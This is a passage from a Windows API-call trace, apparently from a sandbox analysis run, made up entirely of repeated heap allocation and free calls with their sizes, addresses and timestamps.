(HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0xdb6998 [0172.502] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.502] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.502] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdb6998 | out: hHeap=0xcd0000) returned 1 [0172.502] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0xdb6998 [0172.502] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.502] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.502] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdb6998 | out: hHeap=0xcd0000) returned 1 [0172.502] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.502] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.502] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.502] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.502] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.502] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.502] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.502] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.502] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.502] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.503] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.503] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.503] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.503] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.503] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0172.503] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.503] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.503] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.503] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.503] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.503] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.503] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.503] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.503] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.503] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.503] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.503] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.503] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.503] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.503] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.503] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.503] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.503] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.503] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.503] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.503] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.503] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.503] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.503] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.503] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.503] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.503] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.503] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.503] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.503] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.503] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.503] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.503] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.503] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.503] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.503] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.504] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.504] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.504] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.504] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.504] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.504] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.504] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.504] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.504] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.504] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.504] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.504] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.504] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.504] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.504] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.504] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.504] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.504] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.504] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.504] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.504] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.504] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.504] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.504] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.504] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.504] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.504] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.504] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.504] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.504] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.504] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.504] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.504] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.504] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.504] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.504] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.504] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.504] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.504] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.504] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0172.505] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.505] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.505] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.505] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.505] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.505] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.505] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.505] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.505] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.505] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.505] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.505] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.505] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.505] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.505] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.505] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.505] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.505] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.505] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.505] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.505] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.505] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.505] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.505] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.505] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.505] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.505] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.505] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.505] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.505] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.505] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.505] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.505] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.505] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.505] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.505] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.505] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.505] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.506] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.506] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.506] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.506] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.506] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.506] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.506] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.506] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.506] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.506] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.506] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.506] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.506] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.506] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.506] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.506] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.506] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.506] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.506] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.506] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.506] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.506] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.506] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.506] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.506] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.506] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.506] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.506] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.506] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.506] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.506] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.506] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.506] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.506] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.506] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.506] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.506] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.506] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.506] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.507] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.507] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.507] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.507] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.507] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.507] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.507] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.507] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.507] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.507] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.507] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.507] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.507] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.507] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.507] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.507] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.507] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.507] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.507] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.507] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.507] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.507] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.507] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.507] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.507] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.507] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.507] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.507] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.507] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.507] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.507] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.507] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.507] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.507] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.507] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.508] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.508] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.508] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.508] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.508] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.508] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.508] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.508] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.508] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.508] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.508] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.508] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cd28 [0172.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.508] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.508] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.508] RtlAllocateHeap 